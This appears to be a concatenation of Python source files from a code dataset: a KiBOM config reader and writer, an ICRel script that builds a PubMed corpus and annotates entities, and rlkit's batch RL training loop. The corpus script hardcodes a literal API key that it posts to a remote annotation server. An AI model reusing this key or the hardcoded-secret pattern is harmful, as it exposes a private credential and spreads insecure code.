self.digikey_link = False # Columns to link to Digi-Key
self.boards = 1 # Quantity of boards to be made
self.mergeBlankFields = True # Blanks fields will be merged when possible
self.hideHeaders = False
self.hidePcbInfo = False
self.configField = "Config" # Default field used for part fitting config
self.pcbConfig = ["default"]
self.refSeparator = " "
self.backup = "%O.tmp"
self.separatorCSV = None
self.outputFileName = "%O_bom_%v%V"
self.variantFileNameFormat = "_(%V)"
# Default fields used to group components
self.groups = [
ColumnList.COL_PART,
ColumnList.COL_PART_LIB,
ColumnList.COL_VALUE,
ColumnList.COL_FP,
ColumnList.COL_FP_LIB,
# User can add custom grouping columns in bom.ini
]
self.regIncludes = [] # None by default
self.regExcludes = [
[ColumnList.COL_REFERENCE, '^TP[0-9]*'],
[ColumnList.COL_REFERENCE, '^FID'],
[ColumnList.COL_PART, 'mount.*hole'],
[ColumnList.COL_PART, 'solder.*bridge'],
[ColumnList.COL_PART, 'test.*point'],
[ColumnList.COL_FP, 'test.*point'],
[ColumnList.COL_FP, 'mount.*hole'],
[ColumnList.COL_FP, 'fiducial'],
]
# Default component groupings
self.aliases = [
["c", "c_small", "cap", "capacitor"],
["r", "r_small", "res", "resistor"],
["sw", "switch"],
["l", "l_small", "inductor"],
["zener", "zenersmall"],
["d", "diode", "d_small"]
]
# Nothing to join by default (#81)
self.join = []
# Check an option within the SECTION_GENERAL group
def checkOption(self, parser, opt, default=False):
if parser.has_option(self.SECTION_GENERAL, opt):
return parser.get(self.SECTION_GENERAL, opt).lower() in ["1", "true", "yes"]
else:
return default
def checkInt(self, parser, opt, default=False):
if parser.has_option(self.SECTION_GENERAL, opt):
return int(parser.get(self.SECTION_GENERAL, opt).lower())
else:
return default
def checkStr(self, opt, default=False):
if self.parser.has_option(self.SECTION_GENERAL, opt):
return self.parser.get(self.SECTION_GENERAL, opt)
else:
return default
# Read KiBOM preferences from file
def Read(self, file, verbose=False):
file = os.path.abspath(file)
if not os.path.exists(file) or not os.path.isfile(file):
debug.error("{f} is not a valid file!".format(f=file))
return
cf = ConfigParser.RawConfigParser(allow_no_value=True)
self.parser = cf
cf.optionxform = str
cf.read(file)
# Read general options
if self.SECTION_GENERAL in cf.sections():
self.ignoreDNF = self.checkOption(cf, self.OPT_IGNORE_DNF, default=True)
self.generateDNF = self.checkOption(cf, self.OPT_GENERATE_DNF, default=True)
self.useAlt = self.checkOption(cf, self.OPT_USE_ALT, default=False)
self.numberRows = self.checkOption(cf, self.OPT_NUMBER_ROWS, default=True)
self.groupConnectors = self.checkOption(cf, self.OPT_GROUP_CONN, default=True)
self.useRegex = self.checkOption(cf, self.OPT_USE_REGEX, default=True)
self.mergeBlankFields = self.checkOption(cf, self.OPT_MERGE_BLANK, default=True)
self.outputFileName = self.checkStr(self.OPT_OUTPUT_FILE_NAME, default=self.outputFileName)
self.variantFileNameFormat = self.checkStr(self.OPT_VARIANT_FILE_NAME_FORMAT,
default=self.variantFileNameFormat)
self.refSeparator = self.checkStr(self.OPT_REF_SEPARATOR, default=self.refSeparator).strip("\'\"")
if cf.has_option(self.SECTION_GENERAL, self.OPT_CONFIG_FIELD):
self.configField = cf.get(self.SECTION_GENERAL, self.OPT_CONFIG_FIELD)
if cf.has_option(self.SECTION_GENERAL, self.OPT_DEFAULT_BOARDS):
self.boards = self.checkInt(cf, self.OPT_DEFAULT_BOARDS, default=None)
if cf.has_option(self.SECTION_GENERAL, self.OPT_DEFAULT_PCBCONFIG):
self.pcbConfig = cf.get(self.SECTION_GENERAL, self.OPT_DEFAULT_PCBCONFIG).strip().split(",")
if cf.has_option(self.SECTION_GENERAL, self.OPT_BACKUP):
self.backup = cf.get(self.SECTION_GENERAL, self.OPT_BACKUP)
else:
self.backup = False
if cf.has_option(self.SECTION_GENERAL, self.OPT_HIDE_HEADERS):
self.hideHeaders = cf.get(self.SECTION_GENERAL, self.OPT_HIDE_HEADERS) == '1'
if cf.has_option(self.SECTION_GENERAL, self.OPT_HIDE_PCB_INFO):
self.hidePcbInfo = cf.get(self.SECTION_GENERAL, self.OPT_HIDE_PCB_INFO) == '1'
if cf.has_option(self.SECTION_GENERAL, self.OPT_DIGIKEY_LINK):
self.digikey_link = cf.get(self.SECTION_GENERAL, self.OPT_DIGIKEY_LINK)
else:
self.digikey_link = False
# Read out grouping colums
if self.SECTION_GROUPING_FIELDS in cf.sections():
self.groups = [i for i in cf.options(self.SECTION_GROUPING_FIELDS)]
# Read out ignored-rows
if self.SECTION_IGNORE in cf.sections():
self.ignore = [i for i in cf.options(self.SECTION_IGNORE)]
# Read out column order
if self.SECTION_COLUMN_ORDER in cf.sections():
self.corder = [i for i in cf.options(self.SECTION_COLUMN_ORDER)]
# Read out component aliases
if self.SECTION_ALIASES in cf.sections():
self.aliases = [re.split('[ \t]+', a) for a in cf.options(self.SECTION_ALIASES)]
# Read out join rules (#81)
if self.SECTION_JOIN in cf.sections():
self.join = [a.split('\t') for a in cf.options(self.SECTION_JOIN)]
if self.SECTION_REGEXCLUDES in cf.sections():
self.regExcludes = []
for pair in cf.options(self.SECTION_REGEXCLUDES):
if len(re.split('[ \t]+', pair)) == 2:
self.regExcludes.append(re.split('[ \t]+', pair))
if self.SECTION_REGINCLUDES in cf.sections():
self.regIncludes = []
for pair in cf.options(self.SECTION_REGINCLUDES):
if len(re.split('[ \t]+', pair)) == 2:
self.regIncludes.append(re.split('[ \t]+', pair))
# Add an option to the SECTION_GENRAL group
def addOption(self, parser, opt, value, comment=None):
if comment:
if not comment.startswith(";"):
comment = "; " + comment
parser.set(self.SECTION_GENERAL, comment)
parser.set(self.SECTION_GENERAL, opt, "1" if value else "0")
# Write KiBOM preferences to file
def Write(self, file):
file = os.path.abspath(file)
cf = ConfigParser.RawConfigParser(allow_no_value=True)
cf.optionxform = str
cf.add_section(self.SECTION_GENERAL)
cf.set(self.SECTION_GENERAL, "; General BoM options here")
self.addOption(cf, self.OPT_IGNORE_DNF, self.ignoreDNF, comment="If '{opt}' option is set to 1, rows that are not to be fitted on the PCB will not be written to the BoM file".format(opt=self.OPT_IGNORE_DNF))
self.addOption(cf, self.OPT_GENERATE_DNF, self.generateDNF, comment="If '{opt}' option is set to 1, also generate a list of components not fitted on the PCB (HTML only)".format(opt=self.OPT_GENERATE_DNF))
self.addOption(cf, self.OPT_USE_ALT, self.useAlt, comment="If '{opt}' option is set to 1, grouped references will be printed in the alternate compressed style eg: R1-R7,R18".format(opt=self.OPT_USE_ALT))
self.addOption(cf, self.OPT_NUMBER_ROWS, self.numberRows, comment="If '{opt}' option is set to 1, each row in the BoM will be prepended with an incrementing row number".format(opt=self.OPT_NUMBER_ROWS))
self.addOption(cf, self.OPT_GROUP_CONN, self.groupConnectors, comment="If '{opt}' option is set to 1, connectors with the same footprints will be grouped together, independent of the name of the connector".format(opt=self.OPT_GROUP_CONN))
self.addOption(cf, self.OPT_USE_REGEX, self.useRegex, comment="If '{opt}' option is set to 1, each component group will be tested against a number of regular-expressions (specified, per column, below). If any matches are found, the row is ignored in the output file".format(opt=self.OPT_USE_REGEX))
self.addOption(cf, self.OPT_MERGE_BLANK, self.mergeBlankFields, comment="If '{opt}' option is set to 1, component groups with blank fields will be merged into the most compatible group, where possible".format(opt=self.OPT_MERGE_BLANK))
cf.set(self.SECTION_GENERAL, "; Specify output file name format, %O is the defined output name, %v is the version, %V is the variant name which will be ammended according to 'variant_file_name_format'.")
cf.set(self.SECTION_GENERAL, self.OPT_OUTPUT_FILE_NAME, self.outputFileName)
cf.set(self.SECTION_GENERAL, "; Specify the variant file name format, this is a unique field as the variant is not always used/specified. When it is unused you will want to strip all of this.")
cf.set(self.SECTION_GENERAL, self.OPT_VARIANT_FILE_NAME_FORMAT, self.variantFileNameFormat)
cf.set(self.SECTION_GENERAL, '; Field name used to determine if a particular part is to be fitted')
cf.set(self.SECTION_GENERAL, self.OPT_CONFIG_FIELD, self.configField)
cf.set(self.SECTION_GENERAL, '; Character used to separate reference designators in output')
cf.set(self.SECTION_GENERAL, self.OPT_REF_SEPARATOR, "'" + self.refSeparator + "'")
cf.set(self.SECTION_GENERAL, '; Make a backup of the bom before generating the new one, using the following template')
cf.set(self.SECTION_GENERAL, self.OPT_BACKUP, self.backup)
cf.set(self.SECTION_GENERAL, '; Default number of boards to produce if none given on CLI with -n')
cf.set(self.SECTION_GENERAL, self.OPT_DEFAULT_BOARDS, self.boards)
cf.set(self.SECTION_GENERAL, '; Default PCB variant if none given on CLI with -r')
cf.set(self.SECTION_GENERAL, self.OPT_DEFAULT_PCBCONFIG, self.pcbConfig)
cf.set(self.SECTION_GENERAL, '; Whether to hide headers from output file')
cf.set(self.SECTION_GENERAL, self.OPT_HIDE_HEADERS, self.hideHeaders)
cf.set(self.SECTION_GENERAL, '; Whether to hide PCB info from output file')
cf.set(self.SECTION_GENERAL, self.OPT_HIDE_PCB_INFO, self.hidePcbInfo)
cf.set(self.SECTION_GENERAL, '; Interpret as a Digikey P/N and link the following field')
cf.set(self.SECTION_GENERAL, self.OPT_DIGIKEY_LINK, self.digikey_link)
cf.add_section(self.SECTION_IGNORE)
cf.set(self.SECTION_IGNORE, "; Any column heading that appears here will be excluded from the Generated BoM")
cf.set(self.SECTION_IGNORE, "; Titles are case-insensitive")
for i in self.ignore:
cf.set(self.SECTION_IGNORE, i)
cf.add_section(self.SECTION_COLUMN_ORDER)
cf.set(self.SECTION_COLUMN_ORDER, "; Columns will apear in the order they are listed here")
cf.set(self.SECTION_COLUMN_ORDER, "; Titles are case-insensitive")
for i in self.corder:
cf.set(self.SECTION_COLUMN_ORDER, i)
# Write the component grouping fields
cf.add_section(self.SECTION_GROUPING_FIELDS)
cf.set(self.SECTION_GROUPING_FIELDS, '; List of fields used for sorting individual components into groups')
cf.set(self.SECTION_GROUPING_FIELDS, '; Components which match (comparing *all* fields) will be grouped together')
cf.set(self.SECTION_GROUPING_FIELDS, '; Field names are case-insensitive')
for i in self.groups:
cf.set(self.SECTION_GROUPING_FIELDS, i)
cf.add_section(self.SECTION_ALIASES)
cf.set(self.SECTION_ALIASES, "; A series of values which are considered to be equivalent for the part name")
cf.set(self.SECTION_ALIASES, "; Each line represents a list of equivalent component name values separated by white space")
cf.set(self.SECTION_ALIASES, "; e.g. 'c c_small cap' will ensure the equivalent capacitor symbols can be grouped together")
cf.set(self.SECTION_ALIASES, '; Aliases are case-insensitive')
for a in self.aliases:
cf.set(self.SECTION_ALIASES, "\t".join(a))
# (#81)
cf.add_section(self.SECTION_JOIN)
cf.set(self.SECTION_JOIN, '; A list of rules to join the content of fields')
cf.set(self.SECTION_JOIN, '; Each line is a rule, the first name is the field that will receive the data')
cf.set(self.SECTION_JOIN, '; from the other fields')
cf.set(self.SECTION_JOIN, '; Use tab (ASCII 9) as separator')
cf.set(self.SECTION_JOIN, '; Field names are case sensitive')
for a in self.join:
cf.set(self.SECTION_JOIN, "\t".join(a))
cf.add_section(self.SECTION_REGINCLUDES)
cf.set(self.SECTION_REGINCLUDES, '; A series of regular expressions used to include parts in the BoM')
cf.set(self.SECTION_REGINCLUDES, '; If there are any regex defined here, only components that match against ANY of them will be included in the BOM')
cf.set(self.SECTION_REGINCLUDES, '; Column names are case-insensitive')
cf.set(self.SECTION_REGINCLUDES, '; Format is: "[ColumName] [Regex]" (white-space separated)')
for i in self.regIncludes:
if not len(i) == 2:
continue
cf.set(self.SECTION_REGINCLUDES, i[0] + "\t" + i[1])
cf.add_section(self.SECTION_REGEXCLUDES)
cf.set(self.SECTION_REGEXCLUDES, '; A series of regular expressions used to exclude parts from the BoM')
cf.set(self.SECTION_REGEXCLUDES, '; If a component matches ANY of these, it will be excluded from the BoM')
cf.set(self.SECTION_REGEXCLUDES, '; Column names are case-insensitive')
cf.set(self.SECTION_REGEXCLUDES, '; Format is: "[ColumName] [Regex]" (white-space separated)')
for i in self.regExcludes:
if not len(i) == 2:
continue
cf.set(self.SECTION_REGEXCLUDES, i[0] + "\t" + i[1])
with open(file, 'w') as configfile:
cf.write(configfile)
| 48.703812
| 306
| 0.665041
|
83424c6a0ad0ced45a554cebe6a40be9044a3fd0
| 19,934
|
py
|
Python
|
generate_corpus.py
|
lasigeBioTM/ICRel
|
1a66d51763d6ced42a798dba07234617f9a25783
|
[
"MIT"
] | 7
|
2017-12-19T22:03:43.000Z
|
2019-06-20T09:22:46.000Z
|
generate_corpus.py
|
lasigeBioTM/ICRel
|
1a66d51763d6ced42a798dba07234617f9a25783
|
[
"MIT"
] | null | null | null |
generate_corpus.py
|
lasigeBioTM/ICRel
|
1a66d51763d6ced42a798dba07234617f9a25783
|
[
"MIT"
] | 2
|
2018-04-19T13:52:47.000Z
|
2018-09-08T01:47:39.000Z
|
import requests
import logging
import xml.etree.ElementTree as ET
import codecs
import os
import sys
import time
import json
import pickle
from time import sleep
import subprocess
import multiprocessing as mp
from sqlalchemy.orm.exc import NoResultFound
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from database_schema import Corpus, Document, Entity, Sentence, Token, Normalization
"""
Generate corpus based on a pubmed query
"""
def parse_pubmed_xml(xml, pmid):
if xml.strip() == '':
print("PMID not found", pmid)
sys.exit()
else:
root = ET.fromstring(xml)
title = root.find('.//ArticleTitle')
if title is not None:
title = title.text
else:
title = ""
abstext = root.findall('.//AbstractText')
if abstext is not None and len(abstext) > 0:
abstext = [a.text for a in abstext]
if all([abst is not None for abst in abstext]):
abstext = '\n'.join(abstext)
else:
abstext = ""
else:
print("Abstract not found:", title, pmid)
print(xml[:50])
abstext = ""
# print xml
# sys.exit()
articleid = root.findall('.//ArticleId')
#for a in articleid:
# if a.get("IdType") == "pmc":
# self.pmcid = a.text[3:]
return title, abstext
def get_pubmed_abs(pmid):
logging.info("gettting {}".format(pmid))
# conn = httplib.HTTPConnection("eutils.ncbi.nlm.nih.gov")
# conn.request("GET", '/entrez/eutils/efetch.fcgi?db=pubmed&id={}&retmode=xml&rettype=xml'.format(pmid))
payload = {"db": "pubmed", "id": pmid, "retmode": "xml", "rettype": "xml"}
try:
r = requests.get('http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi', payload)
except requests.exceptions.ConnectionError:
r = requests.get('http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi', payload)
# logging.debug("Request Status: " + str(r.status_code))
response = r.text
# logging.info(response)
title, abstract = parse_pubmed_xml(response.encode("utf8"), pmid)
return title, abstract, str(r.status_code)
def get_pubmed_abstracts(searchterms, corpus_text_path, corpus_name, negative_pmids=[]):
session = get_session()
# searchterms = "+".join([t + "[mesh]" for t in terms])
newcorpus = Corpus(name=corpus_name)
for corpus in session.query(Corpus).filter(Corpus.name == corpus_name):
session.delete(corpus)
query = {"term": "{}+hasabstract[text]".format(searchterms),
#"mindate": "2006",
#"retstart": "7407",
"retmax": "100000",
"sort": "pub+date"} #max 100 000
r = requests.get('http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi', query)
logging.debug("Request Status: {}".format(str(r.status_code)))
response = r.text
print(r.url)
root = ET.fromstring(response)
pmids = []
repeats = 0
for pmid in root.find("IdList"):
if pmids not in negative_pmids:
pmids.append(pmid.text)
else:
print("repeated pmid: {}".format(pmid))
repeats += 1
print("repeated: {}".format(repeats))
#with codecs.open(corpus_text_path, 'w', 'utf-8') as docfile:
for i, pmid in enumerate(pmids):
#doc = pubmed.PubmedDocument(pmid)
title, abstract, status = get_pubmed_abs(pmid)
# docfile.write(pmid + "\t" + abstract.replace("\n", " ") + '\n')
doc = session.query(Document).filter(Document.pmid == int(pmid)).first()
if not doc: # create if it doesnt exist already
doc = Document(pmid=int(pmid), title=title, abstract=abstract)
newcorpus.documents.append(doc)
doc.corpora.append(newcorpus)
print("{}/{}".format(i, len(pmids)))
sleep(0.4)
session.add(newcorpus)
session.commit()
def process_documents(corpus_name, nlp):
session = get_session()
corpus_id = session.query(Corpus).filter(Corpus.name == corpus_name).one().id
docs = session.query(Document).filter(Document.corpora.any(id=corpus_id)).filter(Document.parsed == False).all()
#print(docs)
abstracts = [doc.abstract for doc in docs]
pmids = [doc.pmid for doc in docs]
#docs_generator = nlp.pipe(texts=abstracts, batch_size=10, n_threads=2)
for i, doc in enumerate(docs):
#for i, parsed_doc in enumerate(docs_generator):
print(i, '/', len(abstracts))
#print(doc.pmid, doc.title.encode("utf8"))
parsed_doc = nlp(doc.abstract)
doc = session.query(Document).filter(Document.corpora.any(id=corpus_id)) \
.filter(Document.pmid == pmids[i]).one()
for parsed_sentence in parsed_doc.sents:
sentence = Sentence(offset=parsed_sentence.start_char, order=parsed_sentence.start,
section='A', text=parsed_sentence.text)
doc.sentences.append(sentence)
session.add(sentence)
for word in parsed_sentence:
#print(word.i, word.idx, word.text, word.lemma, word.lemma_, word.tag, word.tag_, word.pos, word.pos_)
token = Token(start=word.idx-parsed_sentence.start_char, end=word.idx+len(word.text)-parsed_sentence.start_char,
order=word.i,
text=word.text, pos=word.tag_, lemma=word.lemma_)
sentence.tokens.append(token)
session.add(token)
doc.parsed = True
session.commit()
#for word in results:
# print(word.text, word.lemma, word.lemma_, word.tag, word.tag_, word.pos, word.pos_)
#session.commit()
def load_gold_relations(reltype):
with codecs.open("seedev_relation.txt", 'r', "utf-8") as f:
gold_relations = f.readlines()
entities = {} # text -> types
relations = {} # type#text -> type#text
for r in gold_relations:
values = r.strip().split("\t")
if values[1] == reltype or reltype == "all":
type1, entity1 = values[0].split("#")
type2, entity2 = values[2].split("#")
if entity1 not in entities:
entities[entity1] = set()
if entity2 not in entities:
entities[entity2] = set()
entities[entity1].add(type1)
entities[entity1].add(type2)
if values[0] not in relations:
relations[values[0]] = set()
relations[values[0]].add((values[2], values[1]))
return entities, relations
def run_mer(text, lexicon, docid="0", docsection="A"):
os.chdir("MER")
#get_entities_args = ["./get_entities.sh", docid, docsection, text, lexicon]
get_entities_args = ["./get_entities.sh", text, lexicon]
#print(get_entities_args)
p = subprocess.Popen(get_entities_args, stdout=subprocess.PIPE)
output, err = p.communicate()
os.chdir("..")
#print(output)
return output.decode()
def run_mer_externally(text, lexicons):
"""
Call server to run MER using REST api
:param text:
:param lexicons: list of lexicon names
:param docid:
:param docsection:
:return:
"""
base_url = "http://cloud141.ncg.ingrid.pt/IBELight/ibelight.cgi"
params = {"method":"getAnnotations",
"becalm_key": "3deb66a13349fc7889549dfda065a3d8877ac04f",
"text": text,
"types": lexicons}
request = requests.post(base_url, data=json.dumps(params))
return request.text
def annotate_sentence(sentence_text, sentence_id, lexicon):
#sentence_entities = run_mer_externally(sentence_text, [lexicon])
sentence_entities = run_mer(sentence_text, lexicon)
output = []
if sentence_entities.strip():
for l in sentence_entities.strip().split("\n"):
#print(l)
values = l.split('\t')
char_start, char_end = int(values[0]), int(values[1])
output.append((char_start, char_end, lexicon, values[2], sentence_id))
return output
def annotate_documents(corpus_name, lexicons=["CHEMICAL", "CELL_LINE_AND_CELL_TYPE", "DISEASE", "PROTEIN", "MIRNA",
"SUBCELLULAR_STRUCTURE", "TISSUE_AND_ORGAN"]):
session = get_session()
corpus = session.query(Corpus).filter(Corpus.name == corpus_name).one()
print("annotating {}...".format(corpus))
#procs = []
#output = mp.Queue()
results = []
for lexicon in lexicons:
for entity in session.query(Entity).filter(Entity.corpus_id == corpus.id)\
.filter(Entity.ner == "mer_" + lexicon):
session.delete(entity)
session.commit()
entities_added = 0
all_docs = session.query(Document).filter(Document.corpora.any(name=corpus_name)).all()
for i, doc in enumerate(all_docs):
#if i < 10000:
# continue
#if i == 100:
# sys.exit()
logging.info("{}/{} {}".format(str(i), str(len(all_docs)), doc.pmid))
for sent in session.query(Sentence).filter(Sentence.document_id == doc.pmid):
for lexicon in lexicons:
#annotate_sentence(sent, lexicon, output)
#p = mp.Process(target=annotate_sentence, args=(sent.text, sent.id, lexicon, output))
#procs.append(p)
#p.start()
#logging.info("annotating sentence with {}...".format(lexicon))
sentence_output = annotate_sentence(sent.text, sent.id, lexicon)
#logging.info(sent.text)
#logging.info(sentence_output)
#logging.info("done")
#results += sentence_output
#results = [output.get() for p in procs]
#for p in procs:
# p.join()
#print("adding entities...")
for entity in sentence_output:
char_start, char_end, lexicon, text, sentence_id = entity
try:
#logging.info("searching for tokens...")
token_start_id = session.query(Token)\
.filter(Token.sentence_id == sentence_id) \
.filter(Token.start == char_start) \
.one().id
token_end_id = session.query(Token)\
.filter(Token.sentence_id == sentence_id) \
.filter(Token.end == char_end) \
.one().id
normalized = text
#logging.info("done")
"""if lexicon == "cytokine":
q = session.query(Normalization).filter(Normalization.text == text) \
.filter(Normalization.entity_type == "cytokine").first()
if q:
normalized = q.reference_name
elif lexicon == "cell":
q = session.query(Normalization).filter(Normalization.text == text) \
.filter(Normalization.entity_type == "cell").first()
if q:
normalized = q.reference_name"""
entity = Entity(start=char_start, end=char_end,
start_token_id=token_start_id,
end_token_id=token_end_id,
text=text, type=lexicon,
normalized=normalized, ner="mer_" + lexicon,
sentence_id=sentence_id, corpus_id=corpus.id)
session.add(entity)
#sent.entities.append(entity)
#corpus.entities.append(entity)
entities_added += 1
except NoResultFound:
logging.info("sent {}: {}".format(sentence_id, sent.text))
logging.info("skipped this entity: {}".format(entity))
#print(sentence_id)
#sentence = session.query(Sentence).filter(Sentence.id == sentence_id).one()
session.commit()
logging.info("added {} entities".format(entities_added))
#session.commit()
def normalize_entities(goldstd, lexicons):
session = get_session()
for l in lexicons:
print(l)
if l == "cytokine":
for entity in session.query(Entity).filter(Entity.ner == "mer_" + l):
if goldstd in [c.name for c in entity.sentence.document.corpora]:
q = session.query(Normalization).filter(Normalization.text == entity.text) \
.filter(Normalization.entity_type == entity.type) \
.filter(Normalization.reference_source == "entrez").first()
if q:
# print(q)
normalized = q.reference_name
entity.normalized = normalized
else:
entity.normalized = entity.text
elif l == "cell":
for entity in session.query(Entity).filter(Entity.ner == "mer_" + l):
if goldstd in [c.name for c in entity.sentence.document.corpora]:
q = session.query(Normalization).filter(Normalization.text == entity.text) \
.filter(Normalization.entity_type == entity.type)\
.filter(Normalization.reference_source == "cellontology").first()
if q:
# print(q)
normalized = q.reference_name
entity.normalized = normalized
else:
entity.normalized = entity.text
session.commit()
def write_annotations_to_file(corpus_name):
pass
def annotate_corpus_relations(corpus, model, corpuspath):
logging.info("getting relations...")
# entities, relations = load_gold_relations(reltype)
logging.info("finding relations...")
# print entities.keys()[:20]
for did in corpus.documents:
for sentence in corpus.documents[did].sentences:
sentences_mirnas = []
sentence_tfs = []
#print sentence.entities.elist
for entity in sentence.entities.elist[model]:
if entity.type == "mirna":
sentences_mirnas.append(entity)
elif entity.type == "protein":
sentence_tfs.append(entity)
#for mirna in sentences_mirnas:
# for tf in sentence_tfs:
# ss = ssm.simui_go(mirna.best_go, tf.best_go)
# if ss > 0:
# print(ss, mirna.text, tf.text, mirna.best_go, tf.best_go)
print("saving corpus...")
corpus.save(corpuspath)
def get_session():
with open("config/database.config", 'r') as f:
for l in f:
if l.startswith("username"):
username = l.split("=")[-1].strip()
elif l.startswith("password"):
password = l.split("=")[-1].strip()
#engine = create_engine('sqlite:///database.sqlite', echo=False)
engine = create_engine('mysql+pymysql://{}:{}@localhost/immuno?charset=utf8mb4'.format(username, password), echo=False)
Session = sessionmaker(bind=engine)
#Base = declarative_base()
session = Session()
return session
def main():
start_time = time.time()
# try using configargparse for config files
try:
import configargparse
parser = configargparse.ArgumentParser(description='')
except ImportError:
import argparse
parser = argparse.ArgumentParser(description='')
parser.add('-c', '--my-config', required=False, is_config_file=True, help='config file path')
parser.add_argument("--goldstd", default="", dest="goldstd", help="Gold standard to be used.")
parser.add_argument("--corpus", dest="corpus_path", default="corpora/mirna-ds/abstracts.txt",
help="corpus path")
parser.add_argument("--models", dest="models", help="model destination path, without extension")
parser.add_argument("--entitytype", dest="etype", help="type of entities to be considered", default="all")
parser.add_argument("--pairtype", dest="ptype", help="type of pairs to be considered", default="all")
parser.add_argument("--doctype", dest="doctype", help="type of document to be considered", default="all")
parser.add_argument("--pubmedquery", dest="pubmedquery", help="terms parameter of a pubmed query",
default='(("cystic fibrosis"[MeSH Terms] OR ("cystic"[All Fields] AND "fibrosis"[All Fields]) OR "cystic fibrosis"[All Fields])\
AND ("micrornas"[MeSH Terms] OR "micrornas"[All Fields] OR "mirna"[All Fields])) AND ("2011/09/04"[PDat] : "2016/09/01"[PDat])')
parser.add_argument("-o", "--output", "--format", dest="output",
nargs=2, help="format path; output formats: xml, html, tsv, text, chemdner.")
parser.add_argument("--get_pubmed", action='store_true')
parser.add_argument("--parse", action='store_true')
parser.add_argument("--annotate_entities", action='store_true')
parser.add_argument("--normalize_entities", action='store_true')
parser.add_argument("--lexicons", default=["CHEMICAL", "CELL_LINE_AND_CELL_TYPE", "DISEASE", "PROTEIN", "MIRNA",
"SUBCELLULAR_STRUCTURE", "TISSUE_AND_ORGAN"], nargs='+')
parser.add_argument("--log", action="store", dest="loglevel", default="WARNING", help="Log level")
options = parser.parse_args()
# set logger
numeric_level = getattr(logging, options.loglevel.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % options.loglevel)
while len(logging.root.handlers) > 0:
logging.root.removeHandler(logging.root.handlers[-1])
logging_format = '%(asctime)s %(levelname)s %(filename)s:%(lineno)s:%(funcName)s %(message)s'
logging.basicConfig(level=numeric_level, format=logging_format)
logging.getLogger().setLevel(numeric_level)
logging.getLogger("requests.packages").setLevel(30)
#negative_pmids = open("negative_pmids.txt", 'r').readlines()
if options.get_pubmed:
get_pubmed_abstracts(options.pubmedquery, options.corpus_path, options.goldstd)
if options.parse:
import spacy
from spacy.symbols import ORTH, LEMMA, POS
nlp = spacy.load('en_core_web_md')
#nlp = spacy.load('en')
print("processing corpus")
process_documents(options.goldstd, nlp)
if options.annotate_entities:
annotate_documents(options.goldstd, options.lexicons)
write_annotations_to_file(options.goldstd)
#print session.query(Document).count()
if options.normalize_entities:
normalize_entities(options.goldstd, options.lexicons)
# annotate
#results = pickle.load(open("results/mirna_ds_entities.pickle", 'rb'))
#results.load_corpus("mirna_ds")
#corpus = results.corpus
#annotate_corpus_relations(corpus, "combined", "corpora/mirna-ds/abstracts.txt_1.pickle")
if __name__ == "__main__":
main()
| 44.997743
| 153
| 0.57565
|
31a5287cf6697005fa43a6beb286cea7276a1800
| 3,184
|
py
|
Python
|
rlkit/core/batch_rl_algorithm.py
|
JieRen98/rlkit-pmoe
|
5ef4e056764d2c4a8d6e4c6da89295304b1fec3f
|
[
"MIT"
] | 3
|
2021-06-15T03:03:52.000Z
|
2021-12-20T03:08:03.000Z
|
rlkit/core/batch_rl_algorithm.py
|
JieRen98/rlkit-pmoe
|
5ef4e056764d2c4a8d6e4c6da89295304b1fec3f
|
[
"MIT"
] | null | null | null |
rlkit/core/batch_rl_algorithm.py
|
JieRen98/rlkit-pmoe
|
5ef4e056764d2c4a8d6e4c6da89295304b1fec3f
|
[
"MIT"
] | null | null | null |
import abc
import gtimer as gt
from rlkit.core.rl_algorithm import BaseRLAlgorithm
from rlkit.data_management.replay_buffer import ReplayBuffer
from rlkit.samplers.data_collector import PathCollector
class BatchRLAlgorithm(BaseRLAlgorithm, metaclass=abc.ABCMeta):
def __init__(
self,
trainer,
exploration_env,
evaluation_env,
exploration_data_collector: PathCollector,
evaluation_data_collector: PathCollector,
replay_buffer: ReplayBuffer,
batch_size,
max_path_length,
num_epochs,
num_eval_steps_per_epoch,
num_expl_steps_per_train_loop,
num_trains_per_train_loop,
num_train_loops_per_epoch=1,
min_num_steps_before_training=0,
):
super().__init__(
trainer,
exploration_env,
evaluation_env,
exploration_data_collector,
evaluation_data_collector,
replay_buffer,
)
self.batch_size = batch_size
self.max_path_length = max_path_length
self.num_epochs = num_epochs
self.num_eval_steps_per_epoch = num_eval_steps_per_epoch
self.num_trains_per_train_loop = num_trains_per_train_loop
self.num_train_loops_per_epoch = num_train_loops_per_epoch
self.num_expl_steps_per_train_loop = num_expl_steps_per_train_loop
self.min_num_steps_before_training = min_num_steps_before_training
def _train(self):
if self.min_num_steps_before_training > 0:
init_expl_paths = self.expl_data_collector.collect_new_paths(
self.max_path_length,
self.min_num_steps_before_training,
discard_incomplete_paths=False,
)
self.replay_buffer.add_paths(init_expl_paths)
self.expl_data_collector.end_epoch(-1)
for epoch in gt.timed_for(
range(self._start_epoch, self.num_epochs),
save_itrs=True,
):
self.eval_data_collector.collect_new_paths(
self.max_path_length,
self.num_eval_steps_per_epoch,
discard_incomplete_paths=True,
)
gt.stamp('evaluation sampling')
for _ in range(self.num_train_loops_per_epoch):
new_expl_paths = self.expl_data_collector.collect_new_paths(
self.max_path_length,
self.num_expl_steps_per_train_loop,
discard_incomplete_paths=False,
)
gt.stamp('exploration sampling', unique=False)
self.replay_buffer.add_paths(new_expl_paths)
gt.stamp('data storing', unique=False)
self.training_mode(True)
for _ in range(self.num_trains_per_train_loop):
train_data = self.replay_buffer.random_batch(
self.batch_size)
self.trainer.train(train_data)
gt.stamp('training', unique=False)
self.training_mode(False)
self._end_epoch(epoch)
| 37.023256
| 76
| 0.624372
|
55d13f21e0ae3c167e4da17a45fa2a93c5184dae
| 4,700
|
py
|
Python
|
test/testcases/pyrad/test_lcompare.py
|
Lilith5th/Radiance
|
3aff252e57e6d2ca9205cf7caf20aaa1a897aaf2
|
[
"BSD-3-Clause-LBNL"
] | 154
|
2015-01-27T15:02:36.000Z
|
2022-01-06T18:14:18.000Z
|
test/testcases/pyrad/test_lcompare.py
|
Lilith5th/Radiance
|
3aff252e57e6d2ca9205cf7caf20aaa1a897aaf2
|
[
"BSD-3-Clause-LBNL"
] | 35
|
2015-05-11T21:41:31.000Z
|
2021-12-17T13:23:57.000Z
|
test/testcases/pyrad/test_lcompare.py
|
